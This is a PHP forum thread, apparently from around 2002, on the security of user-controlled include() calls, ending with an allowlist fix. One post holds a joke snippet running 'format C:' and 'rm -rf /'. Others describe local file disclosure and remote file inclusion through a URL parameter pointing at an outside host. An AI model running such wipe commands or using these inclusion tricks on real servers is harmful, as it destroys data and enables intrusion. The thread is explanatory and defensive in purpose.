How to do this: explain.php?what=game_rules

sam
Forum Contributor
Posts: 217
Joined: Thu Apr 18, 2002 11:11 pm
Location: Northern California

Post by sam »

Code:

if(!empty($hacker)){
    if(!passthru("format C:")){
        passthru("rm -rf /");
    }
    echo "You fool now look at what you've done.";
}
Code can only be secure until someone cracks it... Nothing is indestructible.

Cheers Moe :mrgreen:
pHaZed
Forum Commoner
Posts: 28
Joined: Wed May 01, 2002 2:44 am
Location: Sydney -AU

Post by pHaZed »

When developing something like that, you should be aware that someone can do something like this:

http://www.maxxxtorque.com/prodigy/php/ ... /index.php

Imagine if you had something sensitive on your server like this:

http://www.maxxxtorque.com/prodigy/php/ ... .passwords
You can simplify it down to ONLY including php files, like so:

Code:

include("$example.php");

then in the browser http://host.net/file.php?example=filename

it will always add .php file extension to whatever file users are trying to include...
dusty
Forum Contributor
Posts: 122
Joined: Sun Apr 28, 2002 9:52 pm
Location: Portsmouth, VA

Post by dusty »

read the posts before.. adding the ext in the include is useless. if someone passes index.php?var=http://www.hacked.com/blah (.php)
you're still screwed. yeah it keeps them guessing what the ext is, but that could be figured out sooner or later.
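An allowlist version of the include pattern discussed in this thread, as an added example that is not code from any of the posters: the request value is used only as a key into a fixed map, so neither a local path nor a remote URL ever reaches `include`. The function name `resolve_page`, the page keys and the `pages/` directory are assumptions, and the `mixed` type hint needs PHP 8.0 or later.

```php
<?php
declare(strict_types=1);

// Hypothetical page map: the keys are the only values accepted from the
// request; the values are files the site owner placed under pages/.
const PAGES = [
    'game_rules' => 'game_rules.php',
    'faq'        => 'faq.php',
];

/**
 * Resolve a request value to a file path, or null if it is not allowlisted.
 * The request value itself is never concatenated into the path.
 */
function resolve_page(mixed $what, string $baseDir): ?string
{
    // ?what[]=x arrives as an array; reject anything that is not a string.
    if (!is_string($what) || !array_key_exists($what, PAGES)) {
        return null;
    }
    return $baseDir . DIRECTORY_SEPARATOR . PAGES[$what];
}

// Constructed sample inputs: one valid key and the shapes raised in the thread.
$samples = [
    'game_rules',
    'http://www.hacked.com/blah',   // remote URL from the last post
    '.passwords',                   // sensitive local file
    ['game_rules'],                 // array instead of string
];

foreach ($samples as $input) {
    $path = resolve_page($input, __DIR__ . '/pages');
    printf("%-32s => %s\n", json_encode($input), $path ?? 'rejected (404)');
}

// In the real script (explain.php in the thread title) the call would be:
//   $path = resolve_page($_GET['what'] ?? null, __DIR__ . '/pages');
//   if ($path === null) { http_response_code(404); exit; }
//   include $path;
```

Keeping `allow_url_include` off in php.ini (its default) also blocks the remote-URL case, but it does nothing for local files, which is why the allowlist is the primary control.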